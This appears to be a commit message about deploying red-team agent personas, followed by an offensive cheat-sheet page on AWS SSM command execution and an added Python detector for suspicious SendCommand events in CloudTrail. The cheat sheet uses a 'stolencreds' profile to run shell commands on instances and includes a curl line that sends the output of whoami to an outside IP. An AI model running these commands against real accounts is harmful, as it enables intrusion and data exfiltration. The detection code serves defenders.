- install_opencode: deploys 29 personas as agents + 1011 skills to
~/.config/opencode/{agents,skills}/. Uses OpenCode's markdown+YAML
agent format (mode/color/permission) and SKILL.md format.
- Topic filter with sensible defaults (drops marketing/biz ~514 skills).
CLI: --opencode-topics security-offensive,coding-backend,...
- Clone of swisskyrepo/InternalAllTheThings (168 MD, 1.7MB) added to
_shared/ as a reference trove for AD attack paths, ADCS ESC1-15,
Kerberos delegation, NTLM relay/coerce, lateral movement, persistence.
- NEO redteam + VORTEX cloud-ad personas reference the new KB with
MITRE ATT&CK TTP mapping pointers.
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
29 lines
1.3 KiB
Markdown
# AWS - Service - SSM

## Command execution

:warning: The ssm-user account is not removed from the system when SSM Agent is uninstalled.

SSM Agent is preinstalled, by default, on the following Amazon Machine Images (AMIs):

* Windows Server 2008-2012 R2 AMIs published in November 2016 or later
* Windows Server 2016 and 2019
* Amazon Linux
* Amazon Linux 2
* Ubuntu Server 16.04
* Ubuntu Server 18.04
* Amazon ECS-Optimized
```powershell
$ aws ssm describe-instance-information --profile stolencreds --region eu-west-1
$ aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
$ aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds

# e.g.:
$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
```
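A defender's view of the command sequence above, as an added example that is not part of the original cheat sheet: it scans CloudTrail management events for `SendCommand` calls that use a run-script document from a principal outside an allowlist, and records whether the same principal called `DescribeInstanceInformation` shortly before. The events, account ID, ARNs, allowlist and 30-minute window are constructed for illustration, and it assumes the trail records read management events.

```python
import json
from datetime import datetime, timedelta

# SSM documents that run arbitrary commands on a managed instance.
RUN_DOCS = {"AWS-RunShellScript", "AWS-RunPowerShellScript"}
# Hypothetical allowlist: principals expected to use Run Command in this account.
EXPECTED = {"arn:aws:iam::111122223333:user/patch-automation"}
WINDOW = timedelta(minutes=30)  # assumed gap between enumeration and execution

# Constructed CloudTrail events (not real logs), trimmed to the fields used below.
SAMPLE = json.loads("""[
 {"eventTime":"2024-05-01T10:00:05Z","eventSource":"ssm.amazonaws.com","eventName":"DescribeInstanceInformation",
  "awsRegion":"eu-west-1","sourceIPAddress":"198.51.100.7","userIdentity":{"arn":"arn:aws:iam::111122223333:user/dev-ci"}},
 {"eventTime":"2024-05-01T10:02:40Z","eventSource":"ssm.amazonaws.com","eventName":"SendCommand",
  "awsRegion":"eu-west-1","sourceIPAddress":"198.51.100.7","userIdentity":{"arn":"arn:aws:iam::111122223333:user/dev-ci"},
  "requestParameters":{"documentName":"AWS-RunShellScript","instanceIds":["i-0123456789abcdef0"]}},
 {"eventTime":"2024-05-01T11:00:00Z","eventSource":"ssm.amazonaws.com","eventName":"SendCommand",
  "awsRegion":"eu-west-1","sourceIPAddress":"10.0.0.12","userIdentity":{"arn":"arn:aws:iam::111122223333:user/patch-automation"},
  "requestParameters":{"documentName":"AWS-RunShellScript","instanceIds":["i-0123456789abcdef0"]}},
 {"eventTime":"2024-05-01T12:00:00Z","eventSource":"ssm.amazonaws.com","eventName":"SendCommand",
  "awsRegion":"us-east-1","sourceIPAddress":"203.0.113.9","userIdentity":{"arn":"arn:aws:iam::111122223333:user/alice"},
  "requestParameters":{"documentName":"AWS-RunPowerShellScript","instanceIds":["i-0fedcba9876543210"]}}
]""")

def find_suspicious(events):
    """Return one finding per run-script SendCommand issued by a principal outside EXPECTED."""
    findings, last_enum = [], {}  # last_enum: principal ARN -> last DescribeInstanceInformation time
    for ev in sorted(events, key=lambda e: e["eventTime"]):  # ISO-8601 UTC sorts as text
        if ev.get("eventSource") != "ssm.amazonaws.com":
            continue
        arn = ev.get("userIdentity", {}).get("arn", "unknown")
        when = datetime.strptime(ev["eventTime"], "%Y-%m-%dT%H:%M:%SZ")
        if ev.get("eventName") == "DescribeInstanceInformation":
            last_enum[arn] = when
        elif ev.get("eventName") == "SendCommand":
            req = ev.get("requestParameters") or {}
            if req.get("documentName") not in RUN_DOCS or arn in EXPECTED:
                continue
            seen = last_enum.get(arn)
            findings.append({"principal": arn, "source_ip": ev.get("sourceIPAddress"),
                             "region": ev.get("awsRegion"), "document": req["documentName"],
                             "instances": req.get("instanceIds", []),
                             "enumerated_first": seen is not None and when - seen <= WINDOW})
    return findings

if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE):
        print(finding)
```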
## References

* [What is AWS Systems Manager? - AWS](https://docs.aws.amazon.com/systems-manager/latest/userguide/what-is-systems-manager.html)